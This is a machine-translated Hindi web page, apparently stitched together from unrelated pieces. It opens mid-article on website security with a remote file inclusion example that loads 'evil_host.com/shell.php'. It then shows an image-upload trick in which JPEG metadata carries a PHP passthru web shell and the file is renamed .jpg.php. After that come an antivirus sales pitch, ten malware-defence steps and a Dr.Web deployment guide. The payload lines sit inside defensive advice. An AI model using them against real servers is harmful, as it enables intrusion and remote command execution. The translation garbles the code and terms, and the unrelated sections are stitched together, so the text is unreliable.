    हैकर 190607 के बजाय ईविल_होस्ट.com/shell.php को प्रतिस्थापित करेगा, और फिर हैकर के ब्राउज़र का पूरा पता बार site.com/postnews.php?file=evil_host.com/shell.php जैसा दिखेगा और हैकर के पास होगा आपकी साइट पर अपाचे के अधिकारों के साथ उसका अपना वेब शेल।

    फ़ाइल कनेक्शन सुरक्षा:

    • अपनी स्क्रिप्ट में उन सभी मापदंडों की जाँच करें और फ़िल्टर करें जो उपयोगकर्ता दर्ज करता है और जो पता बार के माध्यम से स्क्रिप्ट को पास किया जाता है। ऐसी सामग्री खोजें जो आपकी प्रोग्रामिंग भाषा के लिए सुरक्षित कोडिंग तकनीक सिखाए।
    • हैकर्स वास्तव में इसे पसंद करते हैं जब साइट पर प्रोग्रामिंग भाषा आपको सिस्टम कमांड चलाने की अनुमति देती है। इसलिए, आपको अपनी प्रोग्रामिंग भाषा में ऐसे कार्यों को कॉल करने पर रोक लगाने की आवश्यकता है, यदि, निश्चित रूप से, यह संभव है। उदाहरण के लिए, PHP सेटिंग्स में php.ini में अक्षम_कार्यों का उपयोग करके "निषिद्ध" कार्यों की एक सूची निर्दिष्ट करना संभव है।
  • ट्रोजन चित्र
    यदि आपके पास साइट पर सर्वर पर फ़ाइलें अपलोड करने की क्षमता है, तो अपलोड करने के लिए तैयार रहें, उदाहरण के लिए, अवतार चित्र। जेपीईजी प्रारूप में एक तस्वीर में मेटाडेटा की अवधारणा है (याद रखें कि कैमरा फ्रेम की शूटिंग के दौरान जानकारी कहाँ लिखता है) और यह मेटाडेटा लिखा जाएगा

    "; पासथ्रू ($ _ प्राप्त करें [" cmd "]); गूंज""; ?>

    विस्तार के लिए अधिकांश जांचों को बायपास करने के लिए चित्र का नाम बदल कर अवतारा.jpg.php किया जाएगा, और साइट.com/upload_images/avatara.jpg.php?cmd=server_commands का उपयोग करेगा

    ट्रोजन सुरक्षा:

    • फ़ाइल एक्सटेंशन को सही ढंग से जांचें। भले ही आप अनुमत फ़ाइलों को सही तरीके से संसाधित करते हैं, फिर भी तैयार रहें कि आपकी साइट पर किसी अन्य भेद्यता का उपयोग करके jpg से php तक की छवि का नाम बदल दिया जाएगा। PHP में exif_read_data () जैसे कार्यों का उपयोग करके किसी चित्र में मेटाडेटा की जाँच करें।
    • छवियों के साथ कैटलॉग में प्रोग्रामिंग भाषाओं के निष्पादन को अपने वेब सर्वर के माध्यम से प्रतिबंधित करें। ऐसा करने के लिए, "AddType एप्लिकेशन / x-httpd-" जैसी पंक्तियों के लिए अपाचे कॉन्फ़िगरेशन देखें, जो प्रोग्रामिंग भाषाओं को फ़ाइल एक्सटेंशन के साथ जोड़ता है और छवियों के साथ निर्देशिकाओं में उनके निष्पादन को प्रतिबंधित करता है। अपाचे के लिए, PHP भाषा फ़ाइलों के निष्पादन का निषेध निर्माण होगा


      आदेश अस्वीकार करें, अनुमति दें
      सब से इनकार

    • अपनी प्रोग्रामिंग भाषा के लिए, ऐसी सामग्री ढूंढें जो छवियों को संसाधित करने और उन्हें सर्वर पर सही ढंग से अपलोड करने के लिए सुरक्षित प्रोग्रामिंग तकनीक सिखाती है।

व्यक्तिगत धन्यवाद:

  • आलोचना और सलाह के लिए मित्र अलेक्जेंडर पुपिशेव उर्फ ​​​​लिंक्स
  • वेबसाइट antichat.ru/
  • वेबसाइट xakep.ru/
  • माइकल एबेन, ब्रायन टायमन द्वारा पुस्तक। फ्रीबीएसडी प्रशासन: संतुलन की कला
  • जोएल स्केम्ब्रे, स्टुअर्ट मैकक्लर, जॉर्ज कर्ट्ज़ द्वारा पुस्तक। हैकर्स का राज: नेटवर्क सुरक्षा - तैयार समाधान। दूसरा प्रकाशन

सुरक्षा के बारे में जानकारी के अन्य स्रोत:

  • फ्रीबीएसडी मैन सिक्योरिटी मैन पेज का विवरण है सामान्य समस्यासंरक्षण और अच्छा प्रशासन अभ्यास।
  • freebsd-security @ freebsd.org मेलिंग सूचियों की सदस्यता लें। ऐसा करने के लिए, मेजरडोमो @ freebsd.org पर एक ईमेल भेजें, जिसमें संदेश के मुख्य भाग में सदस्यता फ्रीबीएसडी-सिक्योरिटी टेक्स्ट हो। यह इस मेलिंग सूची पर है कि सबसे अधिक दबाव वाले सुरक्षा मुद्दों पर चर्चा की जाती है।
  • फ्रीबीएसडी सुरक्षा सूचना पृष्ठ freebsd.org/security/
  • FreeBSD सुरक्षा कैसे-करें दस्तावेज़
  • CERT.org वेबसाइट में सभी ऑपरेटिंग सिस्टम की सुरक्षा में कमजोरियों के बारे में जानकारी है।
  • फायरवॉल और इंटरनेट सुरक्षा विलियम आर. चेसविक और स्टीवन एम. बेलोविन द्वारा
  • इंटरनेट फायरवॉल का निर्माण (दूसरा संस्करण) ब्रेंट चैपमैन और एलिजाबेथ ज़्विक्य द्वारा

परिणाम:
मुझे उम्मीद है कि इस लेख ने आपको सभी समस्याओं को एक साथ देखने में मदद की है, अब व्यवस्थापक को अतिरिक्त स्रोतों से कंप्यूटर सुरक्षा, डेटाबेस, वेब सर्वर, प्रोग्रामिंग भाषाओं के बारे में पढ़ने की जरूरत है। लेख को संक्षेप में सारांशित करते हुए, आपको सुरक्षा समस्याओं के जारी होने के बारे में समाचारों से अवगत होना चाहिए, अपने विकास में शुद्धता के लिए सभी इनपुट डेटा को अपडेट और जांचना होगा।
बल आपके साथ हो!

कंपनी की सॉफ़्टवेयर सेवाओं को बिना किसी रुकावट के सफलतापूर्वक काम करने के लिए, उच्च गुणवत्ता इंस्टालेशन, साथ ही साथ एंटी-वायरस सुरक्षा को कॉन्फ़िगर करना... आज, कोई भी कंपनी बनाए रखने के लिए इंटरनेट का उपयोग किए बिना नहीं कर सकती लेखांकन, व्यापार पत्राचार, रिपोर्टिंग। सीआरएम प्रणाली बहुत लोकप्रिय है, लेकिन इसके काम की गुणवत्ता सीधे वैश्विक नेटवर्क से कनेक्शन पर निर्भर करती है।

लाभ अधिष्ठापनएंटीवायरस सॉफ्टवेयर

एंटीवायरसउत्पाद प्रदर्शन करते हैं सुरक्षाअलग - अलग स्तर। कार्यक्रम इस तरह की समस्याओं को रोकने में मदद करते हैं:

  • रिमोट एक्सेस के माध्यम से जानकारी चोरी करना सर्वर, जिसमें एक गोपनीय प्रकृति (उदाहरण के लिए, कंपनी खातों तक पहुँचने के लिए डेटा) शामिल है;
  • DDoS हमलों को अंजाम देने के लिए ऑपरेटिंग सिस्टम में विभिन्न क्लाइंट एप्लिकेशन का कार्यान्वयन;
  • विभिन्न कार्यक्रमों के हानिकारक प्रभावों के कारण कंपनी के उपकरणों की विफलता;
  • अवरुद्ध करना, संचालन के लिए आवश्यक कार्यक्रमों को नुकसान और सर्वर;
  • गोपनीय डेटा की चोरी, मिथ्याकरण या विनाश।

संक्षेप में, एक निष्कर्ष होगा - कार्यान्वयन एंटीवायरसआधार कंपनी को बड़े वित्तीय नुकसान से बचने में मदद करेगा। इसके अलावा, यह न केवल संभावित हैकिंग को रोकने के लिए लागू होता है। सर्वर, बल्कि उपकरण और भुगतान किए गए ऑनलाइन सिस्टम की कार्यक्षमता को बनाए रखने के लिए भी। इसीलिए सवाल समायोजनउच्च गुणवत्ता और कुशल सुरक्षासभी आकारों के व्यवसायों के लिए हमेशा प्रासंगिक।

के लिए सबसे लोकप्रिय सॉफ्टवेयर अधिष्ठापनकार्यालय में

अक्सर, ग्राहक पसंद करते हैं अनुकूलनएंटीवायरस के विभिन्न संस्करण Kaspersky... इस सॉफ़्टवेयर उत्पाद की लोकप्रियता निम्नलिखित विशेषताओं के कारण है:

  • छोटे और मध्यम और बड़े दोनों व्यवसायों के लिए बड़ी संख्या में विकल्प, घरेलू उपयोग के लिए एक अलग लाइन;
  • सॉफ्टवेयर का संकुल Kasperskyके लिए बनाया गया इंस्टालेशनऑफिस में ही नहीं सर्वरलेकिन मोबाइल फोन, लैपटॉप पर भी;
  • सर्वरसहयोग, मेल, विभिन्न फाइलें मज़बूती से सुरक्षित हैं एंटीवायरसउत्पाद;
  • एंटीवायरस Kasperskyइंटरनेट गेटवे पर हमलों का प्रतिकार करता है;
  • अनुकूलनउत्पाद हमले के आंतरिक खतरे को समाप्त करता है सर्वर, क्योंकि इसमें उपयोगकर्ता अधिकारों का विभेदन शामिल है।

अन्य लाभों के बीच अधिष्ठापननिर्दिष्ट एंटीवायरस सिस्टम - डेटा का बैकअप लेना, पासवर्ड संग्रहीत करना और सुरक्षित मोड में इंटरनेट फॉर्मों को स्वत: भरना, रोकना सर्वरस्पैम, फ़िशिंग। इसके अलावा, कीमत सुरक्षाये उत्पाद बहुत फायदेमंद होते हैं। प्रोग्रामिंग की पेचीदगियों की कम समझ रखने वाले उपयोगकर्ताओं के लिए, एंटीवायरस डेवलपर्स Kasperskyएक सुविधाजनक, सरल और सहज ज्ञान युक्त अंतरफलक बनाया।

सुरक्षा सॉफ़्टवेयर चुनते समय क्या देखना है?

  • कौन सर्वरविशिष्ट सॉफ़्टवेयर की गणना की जाती है: घर, छोटे और मध्यम आकार के व्यवसाय, बड़ी कंपनियां;
  • स्थानीय के प्रस्तावित कार्यक्रमों के कवरेज की चौड़ाई सर्वरव्यापार;
  • काम की निरंतरता, आवृत्ति और नवीकरण की शर्तें;
  • एंटीवायरल सिस्टम के केंद्रीकृत प्रबंधन की संभावना;
  • स्थापित व्यावसायिक कार्यक्रमों और अन्य सॉफ़्टवेयर के साथ प्रस्तावित उत्पाद की संगतता।

एक महत्वपूर्ण बिंदु ऐसी कंपनी का चुनाव भी है जो ऐसे उत्पादों को लागू करती है। एक योग्य कर्मचारी कम से कम समय में सही काम करेगा और ग्राहकों के बीच काम करते समय प्रोग्राम टूल्स के कब्जे के संबंध में निर्देशों का संचालन करेगा। सर्वर... ऐसी सेवाएं प्रदान करने की लागत एक महत्वपूर्ण भूमिका निभाती है - हमारी कंपनी में यह हमेशा बहुत लाभदायक होता है।

मैलवेयर से कंप्यूटर नेटवर्क की रक्षा को ठीक से कैसे व्यवस्थित करें।

लेख नौसिखिए सिस्टम प्रशासकों को संबोधित है।

एंटीवायरस सुरक्षा से मेरा तात्पर्य किसी भी मैलवेयर से सुरक्षा से है: वायरस, ट्रोजन, रूट किट, पिछले दरवाजे, ...

1 एंटी-वायरस सुरक्षा पर कदम - नेटवर्क में प्रत्येक कंप्यूटर पर एंटी-वायरस सॉफ़्टवेयर स्थापित करें और इसे कम से कम प्रतिदिन अपडेट करें। एंटी-वायरस डेटाबेस को अपडेट करने की सही योजना: 1-2 सर्वर अपडेट के लिए जाते हैं और नेटवर्क में सभी कंप्यूटरों को अपडेट वितरित करते हैं। सुरक्षा को अक्षम करने के लिए पासवर्ड सेट करना सुनिश्चित करें।

एंटीवायरस सॉफ़्टवेयर के कई नुकसान हैं। मुख्य दोष यह है कि वे कस्टम-निर्मित वायरस नहीं पकड़ते हैं जिनका व्यापक रूप से उपयोग नहीं किया जाता है। दूसरा दोष यह है कि वे प्रोसेसर को लोड करते हैं और कंप्यूटर पर मेमोरी लेते हैं, कुछ और (कैस्पर्सकी), कुछ कम (एसेट नोड 32), इसे ध्यान में रखा जाना चाहिए।

एंटीवायरस सॉफ़्टवेयर स्थापित करना एक अनिवार्य, लेकिन वायरस के प्रकोप से बचाव का अपर्याप्त तरीका है, अक्सर वायरस के हस्ताक्षर इसके फैलने के अगले दिन एंटी-वायरस डेटाबेस में दिखाई देते हैं, और 1 दिन के भीतर वायरस किसी भी कंप्यूटर नेटवर्क के संचालन को पंगु बना सकता है।

आमतौर पर, सिस्टम प्रशासक चरण 1 पर रुक जाते हैं, इससे भी बदतर, वे इसे पूरा नहीं करते हैं या अद्यतनों का पालन नहीं करते हैं, और देर-सबेर संक्रमण अभी भी होता है। आपकी एंटीवायरस सुरक्षा को मजबूत करने के लिए कुछ अन्य महत्वपूर्ण कदम नीचे दिए गए हैं।

चरण दो। पासवर्ड नीति। वायरस (ट्रोजन) मानक खातों के लिए पासवर्ड का अनुमान लगाकर नेटवर्क पर कंप्यूटर को संक्रमित कर सकते हैं: रूट, एडमिन, एडमिनिस्ट्रेटर, एडमिनिस्ट्रेटर। हमेशा जटिल पासवर्ड का प्रयोग करें! पासवर्ड के बिना या साधारण पासवर्ड वाले खातों के लिए, सिस्टम व्यवस्थापक को संबंधित प्रविष्टि के साथ खारिज कर दिया जाना चाहिए काम की किताब... गलत पासवर्ड दर्ज करने के 10 प्रयासों के बाद, क्रूर बल (ब्रूट-फोर्स पासवर्ड अनुमान) से बचाने के लिए खाते को 5 मिनट के लिए अवरुद्ध कर दिया जाना चाहिए। अंतर्निहित व्यवस्थापक खातों का नाम बदलना और उन्हें ब्लॉक करना अत्यधिक वांछनीय है। पासवर्ड को समय-समय पर बदलते रहना चाहिए।

3 कदम। उपयोगकर्ता अधिकारों का प्रतिबंध। एक वायरस (ट्रोजन) नेटवर्क पर इसे लॉन्च करने वाले उपयोगकर्ता की ओर से फैलता है। यदि उपयोगकर्ता के पास सीमित अधिकार हैं: अन्य कंप्यूटरों तक कोई पहुंच नहीं, उसके कंप्यूटर पर कोई प्रशासनिक अधिकार नहीं है, तो एक चल रहा वायरस भी कुछ भी संक्रमित नहीं कर पाएगा। सिस्टम प्रशासकों के लिए वायरस के प्रसार के पीछे अपराधी बनना असामान्य नहीं है: उन्होंने व्यवस्थापक कुंजी-जीन लॉन्च किया और वायरस नेटवर्क पर सभी कंप्यूटरों को संक्रमित करने के लिए चला गया ...

4 कदम। सुरक्षा अद्यतनों की नियमित स्थापना। यह एक कठिन काम है, लेकिन इसे करना ही होगा। आपको न केवल ओएस, बल्कि सभी एप्लिकेशन अपडेट करने की आवश्यकता है: डीबीएमएस, मेल सर्वर।

चरण 5. वायरस के प्रवेश के मार्ग को प्रतिबंधित करना। वायरस एक उद्यम के स्थानीय नेटवर्क में दो तरह से प्रवेश करते हैं: हटाने योग्य मीडिया के माध्यम से और अन्य नेटवर्क (इंटरनेट) के माध्यम से। यूएसबी, सीडी-डीवीडी तक पहुंच से इनकार करके, आप 1 पथ को पूरी तरह अवरुद्ध कर देते हैं। इंटरनेट एक्सेस को प्रतिबंधित करके, आप दूसरा रास्ता ब्लॉक कर देते हैं। यह विधि बहुत प्रभावी है लेकिन इसे लागू करना कठिन है।

6 कदम। फायरवॉल (आईटीयू), वे फायरवॉल (फायरवॉल) भी हैं, वे फायरवॉल भी हैं। उन्हें नेटवर्क सीमाओं पर स्थापित किया जाना चाहिए। अगर आपका कंप्यूटर सीधे इंटरनेट से जुड़ा है, तो आईटीयू चालू होना चाहिए। यदि कंप्यूटर केवल लोकल एरिया नेटवर्क (LAN) से जुड़ा है और सर्वर के माध्यम से इंटरनेट और अन्य नेटवर्क से जुड़ता है, तो इस कंप्यूटर पर ITU को चालू करना आवश्यक नहीं है।

चरण 7. सबनेट में एक उद्यम नेटवर्क का विभाजन। सिद्धांत के अनुसार नेटवर्क को विभाजित करना सुविधाजनक है: एक विभाग एक सबनेट में है, दूसरा विभाग दूसरे में है। सबनेट को भौतिक परत (एससीएस) पर, डेटा लिंक परत (वीएलएएन) पर, नेटवर्क स्तर पर (आईपी पते से पार नहीं किए गए सबनेट) में विभाजित किया जा सकता है।

चरण 8. कंप्यूटर के बड़े समूहों की सुरक्षा के प्रबंधन के लिए विंडोज़ में एक अद्भुत उपकरण है - समूह नीति (जीपीओ)। GPO के माध्यम से कंप्यूटर और सर्वर को कॉन्फ़िगर किया जा सकता है ताकि मैलवेयर का संक्रमण और वितरण लगभग असंभव हो जाए।

चरण 9. टर्मिनल एक्सेस। नेटवर्क में 1-2 टर्मिनल सर्वर सेट करें जिसके माध्यम से उपयोगकर्ता इंटरनेट पर जाएंगे और उनके पर्सनल कंप्यूटर के संक्रमण की संभावना शून्य हो जाएगी।

चरण 10. कंप्यूटर और सर्वर पर शुरू की गई सभी प्रक्रियाओं और सेवाओं की ट्रैकिंग। आप यह सुनिश्चित कर सकते हैं कि जब कोई अज्ञात प्रक्रिया (सेवा) शुरू होती है, तो सिस्टम व्यवस्थापक को एक सूचना प्राप्त होती है। वाणिज्यिक सॉफ्टवेयर जो ऐसा कर सकता है, उसकी लागत बहुत अधिक है, लेकिन कुछ मामलों में लागत उचित है।

व्याचेस्लाव मेदवेदेव, अग्रणी विश्लेषक, विकास विभाग, डॉक्टर वेब

एंटी-वायरस सुरक्षा कार्यान्वयन प्रक्रिया

अक्सर, चयन के समय (और कभी-कभी खरीद के समय भी), ग्राहक एंटी-वायरस सुरक्षा को कैसे लागू करें या पहले इस्तेमाल किए गए उत्पाद को बदलने के चरणों में सिफारिशों में रुचि रखते हैं। यह लेख चर्चा करेगा कि प्रक्रिया को ठीक से कैसे व्यवस्थित किया जाए

अत्यंत महत्वपूर्ण बिंदु... दुर्भाग्य से, ज्यादातर मामलों में, बिक्री संपर्क प्रबंधकों के पास जाते हैं, और परीक्षण सिस्टम प्रशासकों को दिया जाता है। परिणाम अक्सर एक ऐसी रिपोर्ट होती है जो विक्रेता को भी चकित कर देती है। गलत उत्पाद नाम, प्राचीन संस्करण, कार्यक्षमता की कमी के संकेत जो वास्तव में कई वर्षों से उपलब्ध हैं, आदि। सब कुछ फिर से करने की जरूरत है, लेकिन ट्रेन पहले ही निकल चुकी है, और कॉर्पोरेट सम्मान उन्हें यह स्वीकार करने से रोकता है कि उनके विशेषज्ञों में आवश्यक योग्यता की कमी है।

1) वर्कस्टेशन, फ़ाइल सर्वर, मेल सर्वर, साथ ही एंटी-वायरस सुरक्षा प्रबंधन सर्वर के लिए सुरक्षा प्रणालियों के परीक्षण प्रतिष्ठानों के दौरान समाधान की क्षमताओं का अध्ययन।यहां कई खामियां भी हैं। अजीब तरह से पर्याप्त है, लेकिन अक्सर ग्राहक नहीं जानते कि उन्हें क्या चाहिए। और यह ठीक होगा यदि प्रश्न कार्यक्षमता के बारे में था, तो यह समझ में आता है। अक्सर, संगठन में उपयोग किए जाने वाले सॉफ़्टवेयर की सूची का प्रश्न भी कठिनाइयों का कारण बनता है, जो बदले में, आपूर्ति किए गए सॉफ़्टवेयर की सूची पर प्रस्ताव तैयार करने की अनुमति नहीं देता है।

दूसरी समस्या इस तथ्य से संबंधित है कि सिस्टम प्रशासक (जो, एक नियम के रूप में, परीक्षण करते हैं) उपयोग किए गए उत्पादों से अच्छी तरह वाकिफ हैं, लेकिन (स्वाभाविक रूप से) परीक्षण किए गए उत्पाद के फायदे और नुकसान नहीं जानते हैं (लेकिन साथ ही साथ) वे उम्मीद करते हैं कि उत्पाद खरीदने के मामले में नुकसान होगा) ... तदनुसार, खरीदे गए उत्पाद और अनुरोध का उपयोग करके लागू की जाने वाली प्रक्रियाओं की सूची पर संभावित आपूर्तिकर्ता से सहमत होने की अनुशंसा की जाती है चरण-दर-चरण निर्देशइस कार्यक्षमता के लिए या, ऐसे निर्देशों के अभाव में, परीक्षण निर्देश। इससे गैर-स्पष्ट प्रश्नों पर समय बर्बाद करने से बचा जा सकेगा।

2) कंपनी की सूचना सुरक्षा नीति के अनुसार गठित सुरक्षा नीतियों की वैधता की जाँच करना।इस तथ्य के कारण कि प्रत्येक उत्पाद कंपनी के लिए आवश्यक कार्यक्षमता को अपने तरीके से लागू करता है (उदाहरण के लिए, यह नियंत्रण के लिए एक मनमानी ब्राउज़र के उपयोग की अनुमति देता है या नहीं), प्रक्रिया में चरणों की सूची और इसकी अवधि दोनों हो सकती है अलग होना। सामान्य समय में यह महत्वपूर्ण नहीं है, लेकिन वायरल घटना की स्थिति में एक-एक पल कीमती हो सकता है।

3) कंपनी में इस्तेमाल होने वाले डॉ.वेब सॉफ्टवेयर और सॉफ्टवेयर की अनुकूलता की जाँच करना। सॉफ्टवेयर असंगति दुर्लभ है, लेकिन इस संभावना को नजरअंदाज नहीं किया जा सकता है। इसलिए, प्रस्तावित उत्पाद के परीक्षण के दौरान भी यह कदम आवश्यक है।

4) कंपनी के कॉर्पोरेट नेटवर्क की संरचना और कर्मचारियों की कार्यसूची के अनुसार परीक्षण प्रतिष्ठानों के परिणामों के आधार पर डॉ.वेब सॉफ्टवेयर परिनियोजन योजना का स्पष्टीकरण।

a) कंपनी के स्थानीय नेटवर्क में Dr.Web सॉफ़्टवेयर घटकों के परिनियोजन समय का स्पष्टीकरण।अक्सर खरीद प्रक्रिया के दौरान, तैनाती में लगने वाले समय के बारे में एक प्रश्न पूछा जाता है। अभ्यास से पता चलता है कि अधिकांश मामलों में, तैनाती की अवधि पूरी तरह से कंपनी के विशेषज्ञों पर निर्भर करती है। उसी अभ्यास के अनुसार, एक कंपनी के एक सुरक्षा प्रणाली से दूसरे में एक हजार के करीब स्टेशनों की संख्या के साथ पूर्ण हस्तांतरण के लिए पर्याप्त दिन की छुट्टी पर्याप्त है।

ख) स्थानीय स्टेशनों और फ़ाइल सर्वरों पर डॉ.वेब सॉफ्टवेयर परिनियोजन के प्रकार का चयन करना (एडी नीति, स्थानीय रूप से वितरण शुरू करना, असुरक्षित स्टेशनों पर नेटवर्क को स्कैन करना, आदि)। एक कंपनी नेटवर्क बैंडविड्थ, सक्रिय निर्देशिका उपलब्धता और शाखा कार्यालयों और टेलीवर्कर्स के लिए सुरक्षा आवश्यकताओं के आधार पर विभिन्न परिनियोजन विकल्पों में से चुन सकती है (चित्र 1 देखें)।

ग) कंपनी के कॉर्पोरेट नेटवर्क की संरचना और कर्मचारियों की कार्यसूची के अनुसार सॉफ्टवेयर परिनियोजन का क्रम और समय चुनना। सुरक्षा तैनाती के दौरान व्यापार निरंतरता सुनिश्चित करना अनिवार्य है। क्षुद्रता के नियम के अनुसार, सुरक्षा के अभाव में सबसे भयानक संक्रमण हो सकता है।

एंटरप्राइज़ नेटवर्क में एंटी-वायरस इंस्टॉलेशन परिनियोजन योजना का एक उदाहरण अंजीर में दिखाया गया है। 2.

5) सॉफ्टवेयर के साथ काम करने की तकनीक में कंपनी के सुरक्षा प्रशासकों को प्रशिक्षण देना।

6) प्रयुक्त एंटी-वायरस सॉफ़्टवेयर को हटाने और सॉफ़्टवेयर इंस्टॉलेशन से संबंधित प्रक्रियाओं का विकास।

अजीब तरह से, इस्तेमाल किए गए एंटीवायरस को हटाने से बहुत सारे सवाल उठते हैं। ग्राहकों को पहले इस्तेमाल किए गए एंटीवायरस को हटाने के लिए स्थापित एंटीवायरस की आवश्यकता होती है। दुर्भाग्य से, ज्यादातर मामलों में यह संभव नहीं है। साइबर अपराधियों का मुकाबला करने के लिए डिज़ाइन किया गया एंटीवायरस का सेल्फ डिफेंस सिस्टम किसी को भी इसे हटाने से रोकता है।

ए) उस अवधि के लिए सुरक्षा उपायों का विकास जब कंपनी के नेटवर्क तत्वों पर एंटी-वायरस सॉफ़्टवेयर उपलब्ध नहीं है।वैकल्पिक रूप से, इस अवधि के लिए, आप गेटवे पर आने वाले सभी ट्रैफ़िक की स्कैनिंग को परिनियोजित कर सकते हैं और हटाने योग्य मीडिया के उपयोग को प्रतिबंधित कर सकते हैं।

7) कंपनी के नेटवर्क में सॉफ्टवेयर की तैनाती के लिए आवश्यक सेवाओं की उपलब्धता के लिए स्थानीय नेटवर्क (संरक्षित स्टेशन और सर्वर) की जाँच करना।यदि आवश्यक हो, तो कंपनी के नेटवर्क में उपयोग किए जाने वाले फ़ायरवॉल नियमों को समायोजित करें। यह बिंदु भी कठिन है। अजीब तरह से पर्याप्त है, लेकिन संरक्षित कंप्यूटर पर कोई भी उत्पाद पतली हवा से संघनित नहीं हो सकता है। चयनित प्रकार के परिनियोजन के आधार पर, आपको कुछ पोर्ट खोलने, आवश्यक सेवाओं को सक्षम करने आदि की आवश्यकता होती है।

कभी-कभी यह कंपनी द्वारा उपयोग किए जाने वाले बंदरगाहों और सेवाओं पर प्रतिबंध होता है जो तैनाती के प्रकार को चुनने के आधार के रूप में कार्य करता है।

8) कंपनी के नेटवर्क में परिनियोजन कार्यक्रम की स्वीकृति। कंपनी के कर्मचारियों को उनकी चिंता के संदर्भ में शेड्यूल लाना। कंपनी के कर्मचारियों को कंपनी में आयोजित कार्यक्रमों के बारे में (जहाँ तक उनका संबंध है) पता होना चाहिए। की गई गतिविधियों के ढांचे के भीतर, कंपनी के विशेषज्ञों को आवश्यक कंप्यूटरों और परिसरों तक शीघ्रता से पहुंचने में सक्षम होना चाहिए। अक्सर यह संबंधित प्रबंधक के अनुमोदन के बिना संभव नहीं है।

कंपनी के नेटवर्क में एंटीवायरस सॉफ़्टवेयर को बदलना

1) चयनित प्रकार के परिनियोजन के आधार पर आवश्यक सॉफ्टवेयर तैयार करना। यह बिल्कुल स्पष्ट है कि विभिन्न ओएस के लिए, एप्लिकेशन प्रकार इत्यादि। विभिन्न वितरणों का उपयोग किया जाता है।

  • पदानुक्रमित नेटवर्क, क्लस्टर नोड्स के सर्वर की स्थापना, और, यदि आवश्यक हो, तो आवश्यक डेटाबेस (चित्र 3 देखें)।

  • डॉ.वेब सर्वरों के लिए अतिरेक प्रणाली का परिनियोजन (चित्र 4 देखें)। कोई भी सर्वर क्रैश हो सकता है। लेकिन एंटी-वायरस सर्वर के गिरने से संरक्षित स्टेशनों के अपडेट समाप्त हो जाते हैं। इसलिए एंटी-वायरस सर्वर का बैकअप जरूरी है।

  • समूहों और नीतियों को कॉन्फ़िगर करना।
  • यदि आवश्यक हो, तो उपयोगकर्ता समूह को अलग-अलग व्यवस्थापक सौंपें और कंपनी की नीति के अनुसार इन व्यवस्थापकों के अधिकारों को प्रतिबंधित करें।
  • चयनित परिनियोजन नीति के आधार पर आवश्यक कार्रवाइयाँ करना। उदाहरण के लिए, एडी की स्थापना।

2) कंपनी के नेटवर्क को Dr.Web CureNet नेटवर्क उपयोगिता के साथ स्कैन करना! पहले से अज्ञात मैलवेयर की उपस्थिति के लिए (अंजीर देखें। 5)। दुर्भाग्य से, इस बात की कोई गारंटी नहीं है कि जिस पीसी को आप इंस्टॉल करना चाहते हैं वह मैलवेयर से मुक्त है। स्वाभाविक रूप से, एक संक्रमित मशीन पर स्थापना संभव है, लेकिन हमेशा एक मौका होता है कि एक चल रहे दुर्भावनापूर्ण प्रोग्राम में एंटीवायरस की स्थापना का मुकाबला करने के उद्देश्य से कार्यक्षमता होती है। कम से कम, यह सुरक्षा परिनियोजन प्रक्रिया को शेड्यूल से बाहर कर देगा, इसलिए स्थापना से कुछ समय पहले मैलवेयर की जांच करना बेहतर है।

  • पिछले चरण में की गई सेटिंग्स के अनुसार वर्कस्टेशन और फ़ाइल सर्वर के लिए सुरक्षा प्रणाली की स्थापना।
  • मेल सर्वर, इंटरनेट गेटवे के लिए एक सुरक्षा प्रणाली की स्थापना।

5) परीक्षण अवधि के दौरान सॉफ्टवेयर का संचालन।

6) कंपनी की नीति के अनुसार सॉफ्टवेयर अपडेट करना।

7) संरक्षित कार्यस्थानों, फ़ाइल और मेल सर्वरों की आवधिक जांच करना (अंजीर देखें। 7)।

8) मैलवेयर के परीक्षण प्रभावों के विरुद्ध सॉफ़्टवेयर क्रियाओं का नियंत्रण।

9) तकनीकी सहायता के साथ बातचीत के लिए प्रक्रिया की जाँच करना।

सामान्य तौर पर, यदि आप किसी भी चरण के लिए पहले से तैयारी करते हैं तो कुछ भी जटिल नहीं है।

आपकी तैनाती के साथ शुभकामनाएँ!


के साथ संपर्क में

इसे साझा करें